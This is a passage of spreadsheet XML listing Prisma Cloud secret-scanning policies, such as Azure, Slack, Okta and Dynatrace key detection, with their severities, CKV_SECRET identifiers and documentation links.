        </is>
      </c>
      <c r="AC547" t="inlineStr">
        <is>
          <t>CKV_SECRET_16</t>
        </is>
      </c>
      <c r="AD547" t="b">
        <v>1</v>
      </c>
      <c r="AE547" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF547" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>f32d4d2f-c3b4-4adb-93c4-48515d796758</t>
        </is>
      </c>
      <c r="AI547" t="inlineStr"/>
      <c r="AJ547" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK547" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" t="inlineStr"/>
      <c r="B548" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C548" s="2" t="inlineStr"/>
      <c r="D548" t="inlineStr"/>
      <c r="E548" t="inlineStr"/>
      <c r="F548" t="inlineStr"/>
      <c r="G548" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J548" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K548" t="inlineStr">
        <is>
          <t>Azure Subscription Key detected in code</t>
        </is>
      </c>
      <c r="L548" t="inlineStr"/>
      <c r="M548" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N548" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O548" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P548" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q548" t="inlineStr"/>
      <c r="R548" t="inlineStr"/>
      <c r="S548" t="inlineStr"/>
      <c r="T548" t="b">
        <v>0</v>
      </c>
      <c r="U548" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V548" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W548" t="inlineStr">
        <is>
          <t>Azure Subscription Key</t>
        </is>
      </c>
      <c r="X548" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-178</t>
        </is>
      </c>
      <c r="Y548" t="inlineStr"/>
      <c r="Z548" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA548" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB548" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC548" t="inlineStr">
        <is>
          <t>CKV_SECRET_178</t>
        </is>
      </c>
      <c r="AD548" t="b">
        <v>1</v>
      </c>
      <c r="AE548" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF548" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>8f174056-eb7a-408d-ab65-ac9bcb2ae529</t>
        </is>
      </c>
      <c r="AI548" t="inlineStr"/>
      <c r="AJ548" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK548" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" t="inlineStr"/>
      <c r="B549" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C549" s="2" t="inlineStr"/>
      <c r="D549" t="inlineStr"/>
      <c r="E549" t="inlineStr"/>
      <c r="F549" t="inlineStr"/>
      <c r="G549" t="b">
        <v>1</v>
      </c>
      <c r="H5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49" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J549" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K549" t="inlineStr">
        <is>
          <t>Asana Key detected in code</t>
        </is>
      </c>
      <c r="L549" t="inlineStr"/>
      <c r="M549" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N549" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O549" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P549" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q549" t="inlineStr"/>
      <c r="R549" t="inlineStr"/>
      <c r="S549" t="inlineStr"/>
      <c r="T549" t="b">
        <v>0</v>
      </c>
      <c r="U549" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V549" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W549" t="inlineStr">
        <is>
          <t>Asana Key</t>
        </is>
      </c>
      <c r="X549" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24</t>
        </is>
      </c>
      <c r="Y549" t="inlineStr"/>
      <c r="Z549" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA549" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB549" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC549" t="inlineStr">
        <is>
          <t>CKV_SECRET_24</t>
        </is>
      </c>
      <c r="AD549" t="b">
        <v>1</v>
      </c>
      <c r="AE549" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF549" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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49" t="inlineStr">
        <is>
          <t>250a1587-69ae-4878-8a7c-6c300eb9132f</t>
        </is>
      </c>
      <c r="AI549" t="inlineStr"/>
      <c r="AJ549" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK549" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" t="inlineStr"/>
      <c r="B550" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C550" s="2" t="inlineStr"/>
      <c r="D550" t="inlineStr"/>
      <c r="E550" t="inlineStr"/>
      <c r="F550" t="inlineStr"/>
      <c r="G550" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J550" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K550" t="inlineStr">
        <is>
          <t>Dropbox App Credential detected in code</t>
        </is>
      </c>
      <c r="L550" t="inlineStr"/>
      <c r="M550" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N550" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O550" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P550" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q550" t="inlineStr"/>
      <c r="R550" t="inlineStr"/>
      <c r="S550" t="inlineStr"/>
      <c r="T550" t="b">
        <v>0</v>
      </c>
      <c r="U550" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V550" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W550" t="inlineStr">
        <is>
          <t>Dropbox App Credentials</t>
        </is>
      </c>
      <c r="X550" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38</t>
        </is>
      </c>
      <c r="Y550" t="inlineStr"/>
      <c r="Z550" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA550" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB550" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC550" t="inlineStr">
        <is>
          <t>CKV_SECRET_38</t>
        </is>
      </c>
      <c r="AD550" t="b">
        <v>1</v>
      </c>
      <c r="AE550" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF550" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>8f4d0292-8ddc-4505-a52d-3ce1280fc321</t>
        </is>
      </c>
      <c r="AI550" t="inlineStr"/>
      <c r="AJ550" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK550" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" t="inlineStr"/>
      <c r="B551" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C551" s="2" t="inlineStr"/>
      <c r="D551" t="inlineStr"/>
      <c r="E551" t="inlineStr"/>
      <c r="F551" t="inlineStr"/>
      <c r="G551" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J551" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K551" t="inlineStr">
        <is>
          <t>Doppler API Key detected in code</t>
        </is>
      </c>
      <c r="L551" t="inlineStr"/>
      <c r="M551" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N551" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O551" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P551" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q551" t="inlineStr"/>
      <c r="R551" t="inlineStr"/>
      <c r="S551" t="inlineStr"/>
      <c r="T551" t="b">
        <v>0</v>
      </c>
      <c r="U551" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V551" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W551" t="inlineStr">
        <is>
          <t>Doppler API Key</t>
        </is>
      </c>
      <c r="X551" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36</t>
        </is>
      </c>
      <c r="Y551" t="inlineStr"/>
      <c r="Z551" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA551" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB551" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC551" t="inlineStr">
        <is>
          <t>CKV_SECRET_36</t>
        </is>
      </c>
      <c r="AD551" t="b">
        <v>1</v>
      </c>
      <c r="AE551" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF551" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>009c3b4c-16cf-4c85-9b1d-4ab39fdbfb8b</t>
        </is>
      </c>
      <c r="AI551" t="inlineStr"/>
      <c r="AJ551" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK551" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" t="inlineStr"/>
      <c r="B552" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C552" s="2" t="inlineStr"/>
      <c r="D552" t="inlineStr"/>
      <c r="E552" t="inlineStr"/>
      <c r="F552" t="inlineStr"/>
      <c r="G552" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J552" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K552" t="inlineStr">
        <is>
          <t>Slack bot token detected in code</t>
        </is>
      </c>
      <c r="L552" t="inlineStr"/>
      <c r="M552" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N552" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O552" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P552" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q552" t="inlineStr"/>
      <c r="R552" t="inlineStr"/>
      <c r="S552" t="inlineStr"/>
      <c r="T552" t="b">
        <v>0</v>
      </c>
      <c r="U552" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V552" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W552" t="inlineStr">
        <is>
          <t>Slack bot token</t>
        </is>
      </c>
      <c r="X552" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-226</t>
        </is>
      </c>
      <c r="Y552" t="inlineStr"/>
      <c r="Z552" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA552" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB552" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC552" t="inlineStr">
        <is>
          <t>CKV_SECRET_226</t>
        </is>
      </c>
      <c r="AD552" t="b">
        <v>1</v>
      </c>
      <c r="AE552" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF552" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>1a8a90af-0a8b-4827-9097-9fdc45ab8c46</t>
        </is>
      </c>
      <c r="AI552" t="inlineStr"/>
      <c r="AJ552" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK552" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" t="inlineStr"/>
      <c r="B553" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C553" s="2" t="inlineStr"/>
      <c r="D553" t="inlineStr"/>
      <c r="E553" t="inlineStr"/>
      <c r="F553" t="inlineStr"/>
      <c r="G553" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J553" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K553" t="inlineStr">
        <is>
          <t>Sumo Logic Key detected in code</t>
        </is>
      </c>
      <c r="L553" t="inlineStr"/>
      <c r="M553" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N553" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O553" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P553" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q553" t="inlineStr"/>
      <c r="R553" t="inlineStr"/>
      <c r="S553" t="inlineStr"/>
      <c r="T553" t="b">
        <v>0</v>
      </c>
      <c r="U553" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V553" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W553" t="inlineStr">
        <is>
          <t>Sumo Logic Keys</t>
        </is>
      </c>
      <c r="X553" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67</t>
        </is>
      </c>
      <c r="Y553" t="inlineStr"/>
      <c r="Z553" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA553" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB553" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC553" t="inlineStr">
        <is>
          <t>CKV_SECRET_67</t>
        </is>
      </c>
      <c r="AD553" t="b">
        <v>1</v>
      </c>
      <c r="AE553" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF553" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>b5ba4ba2-8e01-4055-8086-e97a5ef5b598</t>
        </is>
      </c>
      <c r="AI553" t="inlineStr"/>
      <c r="AJ553" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK553" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" t="inlineStr"/>
      <c r="B554" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C554" s="2" t="inlineStr"/>
      <c r="D554" t="inlineStr"/>
      <c r="E554" t="inlineStr"/>
      <c r="F554" t="inlineStr"/>
      <c r="G554" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J554" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K554" t="inlineStr">
        <is>
          <t>Okta Token detected in code</t>
        </is>
      </c>
      <c r="L554" t="inlineStr"/>
      <c r="M554" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N554" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O554" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P554" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q554" t="inlineStr"/>
      <c r="R554" t="inlineStr"/>
      <c r="S554" t="inlineStr"/>
      <c r="T554" t="b">
        <v>0</v>
      </c>
      <c r="U554" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V554" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W554" t="inlineStr">
        <is>
          <t>Okta Token</t>
        </is>
      </c>
      <c r="X554" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-56</t>
        </is>
      </c>
      <c r="Y554" t="inlineStr"/>
      <c r="Z554" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA554" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB554" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC554" t="inlineStr">
        <is>
          <t>CKV_SECRET_56</t>
        </is>
      </c>
      <c r="AD554" t="b">
        <v>1</v>
      </c>
      <c r="AE554" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF554" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>ded6eeb0-ff9e-4455-bb8b-b9a5754fb758</t>
        </is>
      </c>
      <c r="AI554" t="inlineStr"/>
      <c r="AJ554" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK554" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" t="inlineStr"/>
      <c r="B555" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C555" s="2" t="inlineStr"/>
      <c r="D555" t="inlineStr"/>
      <c r="E555" t="inlineStr"/>
      <c r="F555" t="inlineStr"/>
      <c r="G555" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J555" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K555" t="inlineStr">
        <is>
          <t>Dynatrace token detected in code</t>
        </is>
      </c>
      <c r="L555" t="inlineStr"/>
      <c r="M555" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N555" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O555" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P555" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q555" t="inlineStr"/>
      <c r="R555" t="inlineStr"/>
      <c r="S555" t="inlineStr"/>
      <c r="T555" t="b">
        <v>0</v>
      </c>
      <c r="U555" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V555" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W555" t="inlineStr">
        <is>
          <t>Dynatrace token</t>
        </is>
      </c>
      <c r="X555" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39</t>
        </is>
      </c>
      <c r="Y555" t="inlineStr"/>
      <c r="Z555" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA555" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB555" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC555" t="inlineStr">
        <is>
          <t>CKV_SECRET_39</t>
        </is>
      </c>
      <c r="AD555" t="b">
        <v>1</v>
      </c>
      <c r="AE555" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF555" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>a4e5aa1e-94ba-4aa1-ab46-1f137b10110c</t>
        </is>
      </c>
      <c r="AI555" t="inlineStr"/>
      <c r="AJ555" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK555" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" t="inlineStr"/>
      <c r="B556" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C556" s="2" t="inlineStr"/>
      <c r="D556" t="inlineStr"/>
      <c r="E556" t="inlineStr"/>
      <c r="F556" t="inlineStr"/>
      <c r="G556" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J556" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K556" t="inlineStr">
        <is>
          <t>MonkeyLearn API Key detected in code</t>
        </is>
      </c>
      <c r="L556" t="inlineStr"/>
      <c r="M556" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N556" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O556" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P556" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q556" t="inlineStr"/>
      <c r="R556" t="inlineStr"/>
      <c r="S556" t="inlineStr"/>
      <c r="T556" t="b">
        <v>0</v>
      </c>
      <c r="U556" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V556" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W556" t="inlineStr">
        <is>
          <t>MonkeyLearn API Key</t>
        </is>
      </c>
      <c r="X556" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-113</t>
        </is>
      </c>
      <c r="Y556" t="inlineStr"/>
      <c r="Z556" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA556" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB556" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC556" t="inlineStr">
        <is>
          <t>CKV_SECRET_113</t>
        </is>
      </c>
      <c r="AD556" t="b">
        <v>1</v>
      </c>
      <c r="AE556" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF556" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>5c008314-3dec-4516-a8a8-c495b389e45b</t>
        </is>
      </c>
      <c r="AI556" t="inlineStr"/>
      <c r="AJ556" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK556" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" t="inlineStr"/>
      <c r="B557" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C557" s="2" t="inlineStr"/>
      <c r="D557" t="inlineStr"/>
      <c r="E557" t="inlineStr"/>
      <c r="F557" t="inlineStr"/>
      <c r="G557" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J557" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K557" t="inlineStr">
        <is>
          <t>Slack Token detected in code</t>
        </is>
      </c>
      <c r="L557" t="inlineStr"/>
      <c r="M557" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N557" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O557" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P557" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q557" t="inlineStr"/>
      <c r="R557" t="inlineStr"/>
      <c r="S557" t="inlineStr"/>
      <c r="T557" t="b">
        <v>0</v>
      </c>
      <c r="U557" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V557" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W557" t="inlineStr">
        <is>
          <t>Slack Token</t>
        </is>
      </c>
      <c r="X557" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14</t>
        </is>
      </c>
      <c r="Y557" t="inlineStr"/>
      <c r="Z557" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA557" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB557" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC557" t="inlineStr">
        <is>
          <t>CKV_SECRET_14</t>
        </is>
      </c>
      <c r="AD557" t="b">
        <v>1</v>
      </c>
      <c r="AE557" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF557" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>bdbbce4e-76c0-47f5-9000-909b259281eb</t>
        </is>
      </c>
      <c r="AI557" t="inlineStr"/>
      <c r="AJ557" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK557" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" t="inlineStr"/>
      <c r="B558" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C558" s="2" t="inlineStr"/>
      <c r="D558" t="inlineStr"/>
      <c r="E558" t="inlineStr"/>
      <c r="F558" t="inlineStr"/>
      <c r="G558" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J558" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K558" t="inlineStr">
        <is>
          <t>Basic Auth Credential detected in code</t>
        </is>
      </c>
      <c r="L558" t="inlineStr"/>
      <c r="M558" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N558" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O558" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P558" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q558" t="inlineStr"/>
      <c r="R558" t="inlineStr"/>
      <c r="S558" t="inlineStr"/>
      <c r="T558" t="b">
        <v>0</v>
      </c>
      <c r="U558" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V558" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W558" t="inlineStr">
        <is>
          <t>Basic Authentication Credentials</t>
        </is>
